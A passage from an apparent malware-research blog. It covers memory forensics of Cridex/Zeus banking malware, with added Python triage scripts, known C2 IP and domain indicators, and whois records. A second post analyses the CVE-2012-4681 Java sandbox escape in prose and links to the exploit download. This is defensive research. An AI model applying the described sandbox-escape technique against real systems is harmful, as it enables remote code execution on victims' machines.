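# 4.27.18.126 is deliberately absent: passive DNS showed it to be CDN space.
KNOWN_C2 = {"146.185.220.176", "146.185.220.35"}


def parse_psscan(text):
    """Parse psscan-style rows into Proc tuples; lines that do not match are skipped."""
    procs = []
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if m:
            procs.append(Proc(m["name"], int(m["pid"]), int(m["ppid"]),
                              m["created"], m["exited"] or ""))
    return procs


def parse_connscan(text):
    return [Conn(m["local"], m["remote"], int(m["pid"]))
            for m in map(CONN_ROW.match, text.splitlines()) if m]


def flag_processes(procs):
    """Return {pid: [reasons]} for processes that deserve a closer look."""
    by_pid = {p.pid: p for p in procs}
    flags = {}
    for p in procs:
        reasons = []
        if p.exited and p.exited == p.created:
            reasons.append("created and exited within the same second")
        if HOTFIX_STYLE.match(p.name):
            reasons.append("hotfix-style name (KB########.exe)")
        if p.name.lower().endswith(".tmp"):
            reasons.append("code executing from a .tmp file")
        if reasons:
            flags[p.pid] = reasons
    # A child of a flagged process inherits suspicion: the post's cmd.exe (PID 1220)
    # stands out because POS4C.tmp (PID 1472) is its parent. Loop until stable so
    # chains of any depth are covered.
    changed = True
    while changed:
        changed = False
        for p in procs:
            if p.ppid in flags:
                reason = f"spawned by suspicious PID {p.ppid} ({by_pid[p.ppid].name})"
                if reason not in flags.setdefault(p.pid, []):
                    flags[p.pid].append(reason)
                    changed = True
    return flags


def suspicious_connections(conns, procs, bad_ips=KNOWN_C2):
    """Match connscan rows against known C2 addresses, naming the owning process."""
    names = {p.pid: p.name for p in procs}
    return [(c.pid, names.get(c.pid, "?"), c.remote)
            for c in conns if c.remote.rsplit(":", 1)[0] in bad_ips]


def triage(ps_text=PSSCAN_SAMPLE, conn_text=CONNSCAN_SAMPLE):
    procs = parse_psscan(ps_text)
    return flag_processes(procs), suspicious_connections(parse_connscan(conn_text), procs)


if __name__ == "__main__":
    flags, hits = triage()
    for pid, reasons in sorted(flags.items()):
        print(f"PID {pid}: " + "; ".join(reasons))
    for pid, name, remote in hits:
        print(f"PID {pid} ({name}) -> {remote} is a known C2 address")
```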
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eqIivDrJey1cdbPRdHjHtna53fXgwAj1JtDYxEo8hMxh1pZBbFqvLFXnMTES1zHxw0SL4ASuwOZ7sDii4xoLigyknNsqtxMgU5vaZzqOwDuflgYuHB1Ouqdf7IkBK8y4fcDdXpYffM2-/s1600/inject.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5eqIivDrJey1cdbPRdHjHtna53fXgwAj1JtDYxEo8hMxh1pZBbFqvLFXnMTES1zHxw0SL4ASuwOZ7sDii4xoLigyknNsqtxMgU5vaZzqOwDuflgYuHB1Ouqdf7IkBK8y4fcDdXpYffM2-/s400/inject.jpg" width="282" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Strings extracted from VAD segment of 'explorer.exe'</td></tr>
</tbody></table>
<div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaDEJ9AgyVzNV6j8RllmcppGB34I8QqsnKqfkFAbpBIufKq6L5FlnqsWRR-1ok_EMuZZdbImcYGX0HM6gFjCByNw0XE_mZNLgzxhCPb019kIXVaZZulrGg5T4A_Z1_XtIobF3wvDsBvYT5/s1600/inject1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaDEJ9AgyVzNV6j8RllmcppGB34I8QqsnKqfkFAbpBIufKq6L5FlnqsWRR-1ok_EMuZZdbImcYGX0HM6gFjCByNw0XE_mZNLgzxhCPb019kIXVaZZulrGg5T4A_Z1_XtIobF3wvDsBvYT5/s400/inject1.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Strings extracted from VAD segment of 'explorer.exe'</td></tr>
</tbody></table>
<br />
It's also interesting to learn if these domains appear in any other processes. The <a href="http://code.google.com/p/volatility/wiki/CommandReferenceMal22#yarascan">'yarascan' </a>plugin is excellent for string searching when you know what you are looking for. From the Volatility command reference: <i>"This plugin can help you locate any sequence of bytes (like assembly instructions with wild cards), regular expressions, ANSI strings, or Unicode strings in user mode or kernel memory."</i><br />
<br />
Running the 'yarascan' plugin against this memory image indicates that the "<b><span style="color: orange;">droppinleverpro.ru</span></b>" domain string is also seen in PID 1056, 'svchost.exe'. I then dumped the VAD segments of this process for further analysis.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoRB7KBdNP50sEaAFT6drCeYWKxFe8HzoPBBPYuA5xuAcQEIRXXEzfa1ON2a1quHyCKuM0jZ5yIXVpn7t96AEiO7Exv4rSD1pxUqr6g6-ruRYsDDCy0BxKKpxgQgmSg6emtC3g3F1rSsC/s1600/yara.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDoRB7KBdNP50sEaAFT6drCeYWKxFe8HzoPBBPYuA5xuAcQEIRXXEzfa1ON2a1quHyCKuM0jZ5yIXVpn7t96AEiO7Exv4rSD1pxUqr6g6-ruRYsDDCy0BxKKpxgQgmSg6emtC3g3F1rSsC/s400/yara.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">'yarascan' indicating string hit in 'svchost.exe'</td></tr>
</tbody></table>
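The VAD-dump 'strings' step and the 'yarascan' step above both come down to locating indicator strings in raw memory. The added script below (not the post's code) does that over a constructed dump in both ASCII and UTF-16LE, which matters because Windows stores many strings wide and plain 'strings' without -el does not show them; it also pulls URLs out of the recovered strings. The dump contents, offsets and the example-bank URL are invented.

```python
"""Search a dumped memory region (e.g. a Volatility 'vaddump' output file) for
indicator strings in ASCII and UTF-16LE, and extract URLs from it.

Added example, not code from the original post. The dump is constructed:
filler bytes plus a few strings placed deliberately; the author's real
explorer.exe VAD segment is not reproduced.
"""
import re

URL = re.compile(r"https?://[\w.-]+(?:/[\w./?=&%-]*)?", re.IGNORECASE)


def build_sample_dump():
    """Constructed stand-in for a VAD dump (filler has no printable bytes)."""
    filler = bytes([0x00, 0x01, 0xFF, 0x80]) * 32
    return b"".join([
        filler,
        b"https://tuningferrarisglamour.ru/savestats/\x00",          # C2 URL, ASCII
        filler,
        "droppinleverpro.ru".encode("utf-16-le") + b"\x00\x00",      # fallback C2, wide
        b"inject target: https://online.example-bank.test/login\x00",  # constructed
        filler,
    ])


def extract_strings(buf, min_len=4):
    """Return sorted (offset, encoding, text) runs, like 'strings' plus 'strings -el'."""
    ascii_run = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_run = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii"))
             for m in ascii_run.finditer(buf)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16-le"))
              for m in wide_run.finditer(buf)]
    return sorted(found)


def find_indicators(buf, indicators):
    """Return {indicator: [(offset, encoding), ...]} for every occurrence in buf."""
    hits = {}
    for ind in indicators:
        for enc, needle in (("ascii", ind.encode("ascii")),
                            ("utf-16le", ind.encode("utf-16-le"))):
            off = buf.find(needle)
            while off >= 0:
                hits.setdefault(ind, []).append((off, enc))
                off = buf.find(needle, off + 1)
    return hits


def extract_urls(buf):
    """URLs found in either encoding, deduplicated and sorted."""
    return sorted({u for _, _, text in extract_strings(buf) for u in URL.findall(text)})


if __name__ == "__main__":
    dump = build_sample_dump()
    for ind, where in find_indicators(dump, ["tuningferrarisglamour.ru",
                                             "droppinleverpro.ru"]).items():
        print(ind, where)
    print(extract_urls(dump))
```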
<br />
<h3>
<span style="font-size: large;">
<u>Domains and IP addresses</u></span></h3>
There were a number of domains and IP addresses seen in this analysis. Again, courtesy of Internet Systems Consortium (ISC), trusty 'whois', and some other tools:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><b><u>ladavaz.info</u></b><br />
Domain ID:D45959608-LRMS<br />
Domain Name:LADAVAZ.INFO<br />
Created On:28-Mar-2012 20:08:39 UTC<br />
Last Updated On:27-May-2012 20:39:14 UTC<br />
Expiration Date:28-Mar-2013 20:08:39 UTC<br />
Sponsoring Registrar:GoDaddy.com LLC (R171-LRMS)<br />
Name Server:NS1.EQVIA.COM<br />
Name Server:NS2.EQVIA.COM<br />
Name Server:MALINAKM.COM.UA<br />
<br />
first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 14:58:21 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-03 00:13:02 -0000<br />
ladavaz.info.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">192.102.6.55</span></b></span><br />
<div style="text-align: left;">
----------------------------------------</div>
<span style="font-family: Courier New, Courier, monospace;"><b><u>art-london.net</u></b><br />
Domain Name: ART-LONDON.NET<br />
Registrar: ACTIVE REGISTRAR, INC.<br />
Whois Server: whois.activeregistrar.com<br />
Referral URL: http://www.activeregistrar.com<br />
Name Server: NS1.ZIKULA-SUPPORT.COM<br />
Name Server: NS2.ZIKULA-SUPPORT.COM<br />
Status: ok<br />
Updated Date: 27-sep-2012<br />
Creation Date: 17-sep-2012<br />
Expiration Date: 17-sep-2013<br />
<br />
first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 13:54:08 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 17:34:18 -0000<br />
art-london.net.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">203.91.113.6</span></b></span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 17:35:22 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-01 21:48:53 -0000<br />
art-london.net.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">195.198.124.60</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b><br /></b></span>
<span style="font-family: inherit;"><b>art-london.net</b> was registered with an email address of 'windowclouse@hotmail.com'. Other domains registered with that address, and their detected activity, include:</span><br />
<br />
blackiceword.com - Zeus name server<br />
compandclub.com - Zeus name server<br />
penel-opessong.com<br />
webgrafismo.net - blackhole exploit kit<br />
demedes.net - Zeus name server<br />
toppaudio.com - Zeus name server<br />
<br />
<div style="text-align: left;">
----------------------------------------</div>
<b style="font-family: 'Courier New', Courier, monospace;"><u>droppinleverpro.ru</u></b><br />
<span style="font-family: Courier New, Courier, monospace;">
domain: DROPPINLEVERPRO.RU</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns1.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns2.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns3.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
nserver: ns4.2ns.info.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
state: REGISTERED, DELEGATED, VERIFIED</span><br />
<span style="font-family: Courier New, Courier, monospace;">
registrar: REGRU-REG-RIPN</span><br />
<span style="font-family: Courier New, Courier, monospace;">
created: 2012.09.07</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
first seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-09-16 16:35:07 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
last seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-09-29 11:20:07 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
droppinleverpro.ru.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">A</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.35</span></b><br />
<div style="text-align: left;">
<span style="font-family: inherit;">----------------------------------------</span></div>
<span style="font-family: Courier New, Courier, monospace;">
<b><u>tuningferrarisglamour.ru</u></b><br />
domain: TUNINGFERRARISGLAMOUR.RU<br />
nserver: ns1.2ns.info.<br />
nserver: ns2.2ns.info.<br />
nserver: ns3.2ns.info.<br />
nserver: ns4.2ns.info.<br />
state: REGISTERED, DELEGATED, VERIFIED<br />
registrar: REGRU-REG-RIPN<br />
created: 2012.09.29<br />
<br />
first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-09-29 15:33:13 -0000<br />
last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2012-10-02 05:56:28 -0000<br />
tuningferrarisglamour.ru.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: orange;">146.185.220.176</span></b></span><br />
<div style="text-align: left;">
----------------------------------------</div>
Also of note were domains seen in the webinject code or in the sections of the VAD segments. These domains were:<br />
<br />
<b style="font-family: 'Courier New', Courier, monospace;"><u>moogparadise.net</u></b><br />
<span style="font-family: Courier New, Courier, monospace;">
Domain Name: MOOGPARADISE.NET</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Registrar: INTERNET.BS CORP.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Whois Server: whois.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Referral URL: http://www.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS-CANADA.TOPDNS.COM</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS-UK.TOPDNS.COM</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS-USA.TOPDNS.COM</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Status: clientTransferProhibited</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Updated Date: 07-sep-2012</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Creation Date: 04-sep-2012</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Expiration Date: 04-sep-2013</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
first seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-09-10 16:41:38 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
last seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-10-02 01:31:42 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">A</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">91.220.35.69</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns-uk.topdns.com.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns-usa.topdns.com.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns-canada.topdns.com.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
moogparadise.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns1.silentdns.com.</span><br />
<div style="text-align: left;">
<span style="font-family: inherit;">----------------------------------------</span></div>
<b style="font-family: 'Courier New', Courier, monospace;"><u>compositiontantalized.net</u></b><br />
<span style="font-family: Courier New, Courier, monospace;">
Domain Name: COMPOSITIONTANTALIZED.NET</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Registrar: INTERNET.BS CORP.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Whois Server: whois.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Referral URL: http://www.internet.bs</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS1.BLACKHULK.BIZ</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Name Server: NS2.BLACKHULK.BIZ</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Status: clientTransferProhibited</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Updated Date: 14-sep-2012</span><br />
<span style="font-family: Courier New, Courier, monospace;">
Creation Date: 14-sep-2012</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">
first seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-10-01 16:32:22 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
last seen</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">2012-10-01 21:10:23 -0000</span><br />
<span style="font-family: Courier New, Courier, monospace;">
compositiontantalized.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">A</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.176</span></b><br />
<span style="font-family: Courier New, Courier, monospace;">
compositiontantalized.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns1.monkeydns.net.</span><br />
<span style="font-family: Courier New, Courier, monospace;">
compositiontantalized.net.</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">NS</span><span class="Apple-tab-span" style="font-family: 'Courier New', Courier, monospace; white-space: pre;"> </span><span style="font-family: Courier New, Courier, monospace;">ns2.monkeydns.net.</span><br />
<div style="text-align: left;">
<span style="font-family: inherit;">----------------------------------------</span></div>
<span style="font-family: Courier New, Courier, monospace;">
<b><span style="color: orange;">192.102.6.55</span></b> - HOSTVDS-NET - TOV HOST VDS - UA</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">203.91.113.6</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - G-Mobile - G-Mobile, Baga-Toiruu 3/9, Chingeltei district-1 - MN</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">195.198.124.60</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - SE-SMMIAB - Skand Meteorologi och Miljoinstr - SE</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.35</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - mdsru-net - MDS LTD - RU</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">146.185.220.176</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - mdsru-net - MDS LTD - RU</span><br />
<b style="font-family: 'Courier New', Courier, monospace;"><span style="color: orange;">91.220.35.69</span></b><span style="font-family: 'Courier New', Courier, monospace;"> - ZAMANHOST-NET - Rusnak Vasil Viktorvich - RO</span><br />
<br />
<span style="font-family: inherit;">There is much more that can be analyzed in both the memory image and the dropped files. Correlation of these findings with other similar spam campaigns would also be interesting. The primary goal of this post was to examine the evolution of this banking malware, especially in light of the prolific Blackhole v2 exploit kit. For obvious reasons, I won't be posting all the webinject URLs, nor will I make the RAM dump publicly available. Notification processes are underway to the affected parties. I will provide any of the above discussed items in their entirety to qualified institutions. Feel free to email me if you want further information on anything discussed here.</span><br />
<span style="font-family: inherit;">-----------------------------------------------------------------------------------------------------------</span><br />
The following link goes to a ZIP file containing several files associated with this post.<br />
<ul>
<li>stones-instruction_think.php</li>
<li>Packet capture of infected host execution run.</li>
<li>Initial lure - croconfrm.html</li>
</ul>
<div>
A partial pack of Blackhole 2 is available for researchers for download via <a href="http://contagiodump.blogspot.com/">Contagio</a>. The pack came from a server with open directories.</div>
<div>
------------------------------------------------------------------------------------------------------------------------------</div>
<h3>
<a href="http://files.deependresearch.org/resources/cridex_ssl.zip">cridex_ssl.zip</a></h3>
<div>
<br /></div>
<br />
<span style="font-family: inherit;"><br />
</span></div>
Andre M. DiMino<br />
<h3>CVE-2012-4681 Java 7 0-Day vulnerability analysis</h3>
Posted 2012-08-27, last updated 2012-08-31.<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: #f1c232;"><b>Update Aug.30, 2012</b></span><br />
<span style="color: #f1c232;"><a href="http://www.oracle.com/technetwork/java/javase/7u7-relnotes-1835816.html" target="_blank">Oracle issued update 7 (7u7), which fixed the vulnerability</a>. </span><br />
<span style="color: #f1c232;"><br /></span>
<span style="color: #f1c232;"><b>Update: Aug. 28, 2012</b>. Rapid 7 / Metasploit <a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/multi/browser/java_jre17_exec.rb">released their module</a>, and we have received a lot of questions about it from people who wish to compare. The original exploit source is below; run from the command line with a security manager enabled, it will print the contents of the C:\ root directory. </span><br />
<br />
<div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM3-GIB2GIylfb2KcX-Up8253xmF_7Lh-3N78-uBFCEtVjlT029mSoJzZk64EhFDvB9fA96sq5Tvob77e5rf6WOZPvUmkMgYyfaM5apKQ2DP-MtoJBcGli2lKuXUBFo9Qhg57H8luxmsdJ/s1600/rain.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM3-GIB2GIylfb2KcX-Up8253xmF_7Lh-3N78-uBFCEtVjlT029mSoJzZk64EhFDvB9fA96sq5Tvob77e5rf6WOZPvUmkMgYyfaM5apKQ2DP-MtoJBcGli2lKuXUBFo9Qhg57H8luxmsdJ/s200/rain.png" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: xx-small;">ladyilonwick.wordpress.com</span></td></tr>
</tbody></table>
Considering that Rapid 7 posted a working exploit and its addition to exploit packs is imminent (<a href="http://krebsonsecurity.com/2012/08/attackers-pounce-on-zero-day-java-exploit/">Attackers Pounce on Zero-Day Java Exploit by Brian Krebs</a>), and that other analysis articles are being published, such as <a href="http://labs.alienvault.com/labs/index.php/2012/new-java-0day-exploited-in-the-wild/">New Java 0day exploited in the wild - by Alienvault</a>, we decided that withholding details of the exploit would not offer additional protection but only hinder the development of protections and signatures.<br />
<br />
As we mentioned earlier, we contacted <a href="http://schierlm.users.sourceforge.net/">Michael Schierl</a>, the Java expert who discovered a number of Java vulnerabilities, and asked him to have a look. He sent back his detailed analysis, the exploit source, and the interim patch with the source code of the patched class. <br />
<br />
<b>Update: Aug. 28, 2012. </b><br />
<b><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681">CVE-2012-4681</a></b><br />
Oracle Java 7 Update 6, and possibly other versions, allows remote attackers to execute arbitrary code via a crafted applet, as exploited in the wild in August 2012 using Gondzz.class and Gondvv.class.<br />
<br />
<blockquote class="tr_bq">
<b><strike>Patch request: </strike></b></blockquote>
<i><strike>At this point the patch is by request, not to preserve the code but to limit it to IT administrators and developers who can test and decide if they want to deploy. We do not want to push/offer it to 3 billion end Java users; it wasn't tested in all the possible scenarios and systems.</strike></i><br />
<blockquote class="tr_bq">
<ul style="text-align: left;">
<li><strike>Interim patch with the source code of the patched class. See the Readme of the patch in the previous post (thanks to Michael Schierl). </strike></li>
</ul>
<i><strike>Email from your company email address to <b><span style="color: #f6b26b;">admin &lt;at&gt; deependresearch.org </span></b></strike></i></blockquote>
<blockquote class="tr_bq">
<b>Additionally, you can request:</b><br />
<ul style="text-align: left;">
<li>Commented and stripped-down version of the exploit source, to be run from the command line with a security manager enabled, and it will print the contents of the C:\ root directory (thanks to Michael Schierl)</li>
</ul>
<ul style="text-align: left;">
<li>Original 0-day attack HTML page with javascript, Java applet, downloaded Poison Ivy RAT, and pcap.</li>
</ul>
<i>Email from your company email address to </i><b style="font-style: italic;"><span style="color: #f6b26b;">admin &lt;at&gt; deependresearch.org </span></b><i>and explain the planned use, please.</i><br />
</blockquote>
<br />
<br />
<b>Analysis </b><br />
<blockquote>
The Gondvv class decompiles cleanly, and that contained all the interesting parts. The real vulnerability seems to be inside the new Java 7 class com.sun.beans.finder.ClassFinder,</blockquote>
<blockquote>
<a href="http://www.docjar.com/docs/api/com/sun/beans/finder/ClassFinder.html">http://www.docjar.com/docs/api/com/sun/beans/finder/ClassFinder.html</a></blockquote>
<blockquote>
which seems to make it possible for untrusted code to get access to classes in restricted packages (i.e. packages that are part of the security implementation itself and where usually untrusted code cannot get either access or call it). At the beginning, the exploit uses that ClassFinder class to get a reference to the sun.awt.SunToolkit class (sun.* is a restricted package).</blockquote>
<blockquote>
<a href="http://www.docjar.com/docs/api/sun/awt/SunToolkit.html">http://www.docjar.com/docs/api/sun/awt/SunToolkit.html</a></blockquote>
<blockquote>
The rest of the exploit is "only" using that reference to call the GetField method, which can be used to get access to private fields (which should not be a problem as the class is in a restricted package), to get access to a field that stores the permissions for running a java.beans.Statement.</blockquote>
<blockquote>
<a href="http://www.docjar.com/html/api/sun/awt/SunToolkit.java.html#301">http://www.docjar.com/html/api/sun/awt/SunToolkit.java.html#301</a></blockquote>
<blockquote>
A Statement is created that disables the security manager (by default with permissions of the untrusted code). But before calling the statement, the permissions stored in that field we just got access to are overwritten with permissions that allow running all code, and the statement can be called now and disable the security manager for us. At this point, no security manager is left, and the applet can do anything Java can.</blockquote>
<blockquote>
This method of abusing restricted package permissions is new to me (it does not work in Java 6 either, as GetField was private there); but it is not unique - there are several ways you can use to get out of the sandbox if you have access to restricted packages - usually they need a bit more code though.</blockquote>
<blockquote>
What makes the code a bit more complex is the fact that the bytecode verifier also tries to verify if you are accessing restricted packages, therefore all access to restricted packages has to be done indirectly (that is also good for obfuscation, but here needed to make the exploit work, too). ~ Michael Schierl</blockquote>
Update: Aug 28, 2012<br />
<a href="http://www.mediafire.com/file/77f649zqu902xw6/Java7ZeroDay.zip">Download it</a> (by Michael Schierl)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQU3ATrL8b7pafGPuE27w4-URGanCPKadMjmIsqm-GsTRfFoLUwKLwEViJr0dEpCbBlCh4d2Nudtjsq-VZW78TRdx8r35DBpUQgcPLFre1ti6itct247oyc_Lq2DFleGbXXpDqvXZX8C1S/s1600/jj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQU3ATrL8b7pafGPuE27w4-URGanCPKadMjmIsqm-GsTRfFoLUwKLwEViJr0dEpCbBlCh4d2Nudtjsq-VZW78TRdx8r35DBpUQgcPLFre1ti6itct247oyc_Lq2DFleGbXXpDqvXZX8C1S/s640/jj.png" width="630" /></a></div>
<br />
<br />
<b>Read Part I <a href="http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html">Java 7 0-Day vulnerability information and mitigation.</a></b><br />
<br />
<b>More details :</b><br />
<a href="http://immunityproducts.blogspot.com/2012/08/java-0day-analysis-cve-2012-4681.html">Aug. 28 More detailed analysis > "Immunity. Java 0day analysis (CVE-2012-4681) by Esteban"</a><br />
<a href="http://www.kahusecurity.com/2012/java-0-day-using-latest-dadongs-js-obfuscator/">Aug. 28 Java 0-Day Using Latest Dadong’s JS Obfuscator by Kahu Security</a><br />
